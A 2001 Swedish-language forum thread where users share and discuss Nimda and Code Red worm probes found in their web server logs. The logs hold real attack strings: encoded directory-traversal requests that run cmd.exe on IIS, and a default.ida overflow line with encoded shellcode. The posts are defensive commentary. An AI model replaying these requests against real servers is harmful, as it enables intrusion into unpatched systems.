EemissionMedlem sedan dec. 19996 721 inlägg NnicclasMedlem sedan feb. 20001 050 inlägg Jo man får fett med såna här i sin Apache logg ;)
213.11.168.2 - - [18/Sep/2001:21:58:08 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 272
213.11.168.2 - - [18/Sep/2001:21:58:08 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 270
213.11.168.2 - - [18/Sep/2001:21:58:08 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 280
213.11.168.2 - - [18/Sep/2001:21:58:08 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 280
213.11.168.2 - - [18/Sep/2001:21:58:08 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
213.11.168.2 - - [18/Sep/2001:21:58:08 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
213.11.168.2 - - [18/Sep/2001:21:58:08 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
213.11.168.2 - - [18/Sep/2001:21:58:08 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
213.11.168.2 - - [18/Sep/2001:21:58:08 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293
213.11.168.2 - - [18/Sep/2001:21:58:09 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293
213.11.168.2 - - [18/Sep/2001:21:58:09 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293
213.11.168.2 - - [18/Sep/2001:21:58:09 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293
213.11.168.2 - - [18/Sep/2001:21:58:09 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 277
213.11.168.2 - - [18/Sep/2001:21:58:09 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 277
213.11.168.2 - - [18/Sep/2001:21:58:09 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
213.11.168.2 - - [18/Sep/2001:21:58:09 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
CChainsawMedlem sedan sep. 20001 124 inlägg Jag är rädd för att jag kan ha något att göra med den här prylen, hur otroligt det än kan låta. För någon vecka sedan uttrycke jag min avsky mot dessa idioter som inte hade något bättre för sig, och listade upp exakt vad de gjorde fel. Ett av felen - enbart rikta in sig på ett säkerhetshål - verkar vara ändrat här. Denna mask utnyttjar en rad kända buggar som förhoppningsvis ska vara patchade i de flesta maskiner med IIS, och kan även skicka filer till IE om det vill sig riktigt illa.
Som en kompis sade: virus-tillverkare behöver inte hjälp från proffs. Tror jag ska hålla käften om svagheter i virus hädanefter...
------------------
Hollowhead - levererar din dagliga dos av nyttig hårdrock!
UlfTMedlem sedan maj 20018 027 inläggJag undrar lite över vad de försöker komma åt. Det ser ju ut som om anropen försöker komma åt "c:\winnt\system32\cmd.exe". Men brukar en webserver verkligen ge åtkomst åt de filerna? Jag trodde man satte en separat rotkatalog för webservern, och sedan skulle användarna bara komma åt filer i den katalogen samt underliggande kataloger, och absolut inga i "winnt". Jag har visserligen för mig att det har talats om någon bugg som skulle ge sådan åtkomst, men det var länge sedan. Det vore intressant om någon kunde ge mig lite klarhet i det här.
CChainsawMedlem sedan sep. 20001 124 inlägg Masken går igenom olika svagheter som den känner till. Om den får ett svar från servern som är en directory listing så vet den att just det hålet existerar i servern, och sänder in sig själv genom att utnyttja hålet. När servern väl är infekterad smittar den även ner opatchade IE-installationer som besöker servern, och går på egen hand ut och söker av nätet.
Alla hål som utnyttjas är alltså gamla välkända hål med fixar tillgängliga - de som blir infekterade av denna server har slappat med säkerheten.
------------------
Hollowhead - levererar din dagliga dos av nyttig hårdrock!
MMattiasWMedlem sedan jan. 2000144 inlägg Menar du att det i tidigare versioner gick att komma åt CMD.EXE på servern genom att skriva "/c/winnt/system32/cmd.exe", tittade i nicclas logg.
Hur kan man leverera en webbserver med så uppenbara säkerhetsluckor. Det är skrämmande tycker jag.
Har dom ingen säkerhetskunnig person som kan granska programmen innan dom släpps?
Förmodligen har dom det nu för tiden (hoppas jag).
NnicclasMedlem sedan feb. 20001 050 inlägg Menar du att det i tidigare versioner gick att komma åt CMD.EXE på servern genom att skriva "/c/winnt/system32/cmd.exe"
Nej, denna sökväg "fungerar" bara om din server är infekterad med ett virus, inte annars.
MMattiasWMedlem sedan jan. 2000144 inlägg Det var ju för väl.
Tittade i loggfilen för idag och förutom alla försök att komma åt root.exe och cmd.exe hittade jag denna rad:
2001-09-19 07:01:47 61.129.52.227 - 213.88.220.58 80 GET /default.ida XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 401 -
Undrar vad det är?
[Redigerat av MattiasW den 19 sep 2001]
[Redigerat av MattiasW den 19 sep 2001]
SSPiNMedlem sedan mars 20007 896 inlägg default.ida är en fil som Code Red använder. Vet dock inte hur det funkar, om det har försökt krypa in via din server kanske.
------------------
SPiN, bjorne.w@telia.com
-- They pretend to pay me, I pretend to work --
UlfTMedlem sedan maj 20018 027 inläggJag roade mig i går kväll med att kolla några av de webservrar som skickar Code Red och Nimda-attacker. Det verkar bara vara Nimda som gäller nu, alla hade den där readme.eml-filen. En del av servrarna hade en defaultsida som förmodligen installeras när man installerar servern. Det får mig att undra om just dessa användare ens vet om att de kör en webserver. Installeras IIS automatiskt med serverversionerna av NT och w2k?
weee.... 23000 träfar *asg* ahh.. härligt att man inte kör IIS på jobb... :)
[r] 73' över dan!!!
------------------
[20:24] <wFare på IRC 1> Någon som tagit EDCL?
[20:25] <wFare på IRC 2> nej, jag tar inte droger!
[20:25] <wFare på IRC 3> Knarkarjävel
[20:25] <wFare på IRC 4> hehe :)
[Redigerat av stoffe-2k den 20 sep 2001]